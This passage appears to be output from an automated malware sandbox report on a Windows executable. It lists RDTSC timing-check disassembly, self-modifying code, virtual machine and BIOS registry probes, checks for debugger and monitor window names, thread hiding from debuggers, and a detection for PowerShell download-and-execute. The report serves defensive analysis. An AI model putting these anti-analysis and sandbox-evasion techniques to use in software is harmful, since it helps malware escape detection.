                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB4ED7 second address: BB4EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF154CE3616h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d jns 00007FF154CE361Ah 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB55AE second address: BB55B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5A07 second address: BB5A4C instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF154CE361Ch 0x00000008 jc 00007FF154CE3616h 0x0000000e push esi 0x0000000f jnc 00007FF154CE3616h 0x00000015 jng 00007FF154CE3616h 0x0000001b pop esi 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jns 00007FF154CE3635h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB5A4C second address: BB5A64 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF154EB226Eh 0x00000008 jbe 00007FF154EB2266h 0x0000000e pushad 0x0000000f popad 0x00000010 jl 00007FF154EB226Ch 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6278 second address: BB628C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FF154CE361Bh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB628C second address: BB6298 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BB6298 second address: BB629E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC742 second address: BBC75C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB2276h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC75C second address: BBC760 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC311 second address: BBC315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC45F second address: BBC46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE361Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BBC46E second address: BBC472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3001 second address: BC3006 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC3006 second address: BC302E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154EB2279h 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e jbe 00007FF154EB2266h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC302E second address: BC3032 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC93F8 second address: BC9404 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC9404 second address: BC940D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BC940D second address: BC9412 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC5CB second address: BCC5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BCC277 second address: BCC27D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE615F second address: BE6163 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6163 second address: BE6169 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE6169 second address: BE61C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FF154CE361Ch 0x0000000c jmp 00007FF154CE361Fh 0x00000011 jnl 00007FF154CE3632h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FF154CE3625h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4A37 second address: BE4A41 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF154EB2281h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4D00 second address: BE4D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4D04 second address: BE4D15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB226Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4D15 second address: BE4D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FF154CE3621h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4D2D second address: BE4D31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4D31 second address: BE4D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF154CE3616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e js 00007FF154CE361Eh 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4EA4 second address: BE4EAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4EAA second address: BE4EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FF154CE3629h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4EC8 second address: BE4ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE4ECE second address: BE4ED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF154CE3616h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BE9BB7 second address: BE9BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC73E second address: BEC74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE361Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC74C second address: BEC750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC750 second address: BEC756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC2F0 second address: BEC314 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FF154EB227Eh 0x0000000c jmp 00007FF154EB2278h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC314 second address: BEC319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BEC319 second address: BEC32B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push edx 0x00000007 pop edx 0x00000008 jl 00007FF154EB2266h 0x0000000e popad 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF83D5 second address: BF83FD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF154CE361Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF154CE3621h 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B05D79 second address: B05D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FF154EB2266h 0x0000000c popad 0x0000000d jo 00007FF154EB226Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18E7A second address: C18E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18E7E second address: C18E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C18E8B second address: C18E90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C192B1 second address: C192C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF154EB2266h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jp 00007FF154EB2266h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19427 second address: C1942C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1942C second address: C19436 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF154EB226Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19436 second address: C19442 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19442 second address: C19448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19448 second address: C1945E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF154CE3616h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jns 00007FF154CE3616h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C196F3 second address: C19706 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF154EB226Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19706 second address: C1972E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF154CE3623h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF154CE361Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1986F second address: C19874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1C8EB second address: C1C8F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF154CE3616h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CC1E second address: C1CC90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2273h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jl 00007FF154EB227Ch 0x00000011 push ecx 0x00000012 jmp 00007FF154EB2274h 0x00000017 pop ecx 0x00000018 nop 0x00000019 mov edx, 7892B9C6h 0x0000001e mov dword ptr [ebp+122D2B20h], esi 0x00000024 push 00000004h 0x00000026 push 00000000h 0x00000028 push ebp 0x00000029 call 00007FF154EB2268h 0x0000002e pop ebp 0x0000002f mov dword ptr [esp+04h], ebp 0x00000033 add dword ptr [esp+04h], 0000001Bh 0x0000003b inc ebp 0x0000003c push ebp 0x0000003d ret 0x0000003e pop ebp 0x0000003f ret 0x00000040 or dh, FFFFFFC2h 0x00000043 push 39682D4Ch 0x00000048 push edi 0x00000049 pushad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CEC4 second address: C1CEE3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF154CE361Ah 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FF154CE361Ch 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CEE3 second address: C1CF34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF154EB226Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jbe 00007FF154EB2272h 0x00000014 push dword ptr [ebp+122D1D86h] 0x0000001a mov edx, 1FE901B2h 0x0000001f call 00007FF154EB2269h 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FF154EB2274h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CF34 second address: C1CF38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1CF38 second address: C1CF7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jmp 00007FF154EB226Ch 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 jno 00007FF154EB2274h 0x00000017 mov eax, dword ptr [eax] 0x00000019 jno 00007FF154EB226Eh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 pop edx 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FF0A second address: C1FF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FF0E second address: C1FF77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF154EB2273h 0x00000007 jnc 00007FF154EB2266h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push ebx 0x00000012 jo 00007FF154EB2266h 0x00000018 jmp 00007FF154EB2278h 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FF154EB2278h 0x00000025 jmp 00007FF154EB2270h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1FF77 second address: C1FF7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C219D7 second address: C219E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43941 second address: B43945 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B61 second address: B43B65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B65 second address: B43B7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FF154CE3616h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FF154CE3616h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B7E second address: B43B88 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF154EB2266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B43B88 second address: B43B8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 991A13 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 991972 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: BC38BD instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_007438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00744910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00744910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0073DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0073E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00744570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00744570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0073ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0073BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0073DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_007316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0073F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00743EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00743EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0073F68A FindFirstFileA,0_2_0073F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00731160 GetSystemInfo,ExitProcess,0_2_00731160
                Source: file.exe, file.exe, 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2170845587.0000000001413000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2170845587.0000000001440000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2170845587.00000000013CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2170153838.0000000000B15000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13417
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13420
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13439
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13471
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13431
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_007345C0 VirtualProtect ?,00000004,00000100,000000000_2_007345C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00749860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00749750 mov eax, dword ptr fs:[00000030h]0_2_00749750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00747850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00747850
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 5588, type: MEMORYSTR
                Searches for specific processes (likely to inject)
